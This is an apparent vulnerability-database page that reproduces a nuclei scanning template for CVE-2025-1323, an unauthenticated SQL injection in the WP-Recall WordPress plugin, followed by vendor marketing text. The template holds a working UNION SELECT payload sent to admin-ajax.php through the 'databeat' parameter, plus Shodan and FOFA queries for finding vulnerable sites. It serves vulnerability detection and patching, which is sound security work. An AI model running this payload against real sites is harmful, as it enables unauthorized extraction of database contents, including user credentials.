Lucene search
K

WP-Recall – Plugin <= 16.26.10 - Unauthenticated SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 41 Views

WP-Recall plugin <= 16.26.10 has high severity SQL Injection vulnerability for unauthenticated users.

Related
Refs
Code
id: CVE-2025-1323

info:
  name: WP-Recall – Plugin <= 16.26.10 - Unauthenticated SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The WP-Recall – Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection via the 'databeat' parameter in all versions up to, and including, 16.26.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries through time-based blind SQL injection in the databeat parameter, leading to extraction of sensitive database information including user credentials and personal data.
  remediation: |
    Update to version 16.26.12, or a newer patched version
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-recall/wp-recall-registration-profile-commerce-more-162610-unauthenticated-sql-injection
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae5b4d81-c2f1-4d0d-b7b0-5556bf0451f5?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-1323
    cwe-id: CWE-89
    epss-score: 0.02886
    epss-percentile: 0.8518
    cpe: cpe:2.3:a:plechevandrey:wp-recall:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: plechevandrey
    product: wp-recall
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/wp-recall/"
    fofa-query: body=/wp-content/plugins/wp-recall/
    publicwww-query: /wp-content/plugins/wp-recall/
  tags: cve,cve2025,wp-recall,wordpress,wp-plugin,sqli,wp,vuln

variables:
  marker: "{{randstr}}"
  token: "{{base64('private:1:5')}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/"
    extractors:
      - type: regex
        part: body
        internal: true
        name: nonce
        group: 1
        regex:
          - 'var Rcl = .*?"nonce":"([a-z0-9]+)"'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=rcl_beat&ajax_nonce={{nonce}}&databeat=[{"beat_name":"rcl_chat_beat_core","action":"rcl_chat_get_new_messages","data":{"token":"{{token}}","last_activity":"xx' and 1=0 union select 1,2,concat(0x{{hex_encode(marker)}}3a,version()),4,5,6,7--+-"}}]

    extractors:
      - type: regex
        part: body
        internal: false
        name: version
        group: 1
        regex:
          - 'data-user_id=\\".*?:(.*?)\\">'

    matchers:
      - type: word
        part: body
        words:
          - '{{marker}}'
          - 'content'
          - '"beat_name":"rcl_chat_beat_core"'
        condition: and
# digest: 4a0a0047304502203f673e998df61b3d9b619bdcd4b12808f84a9d420b211a65064549926b9fad1e022100f3180dff0a93db68314f5d55848a192a3bcadfa7c527571f389eabb2d12f5013:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5 - 9.8
EPSS0.02886
SSVC
41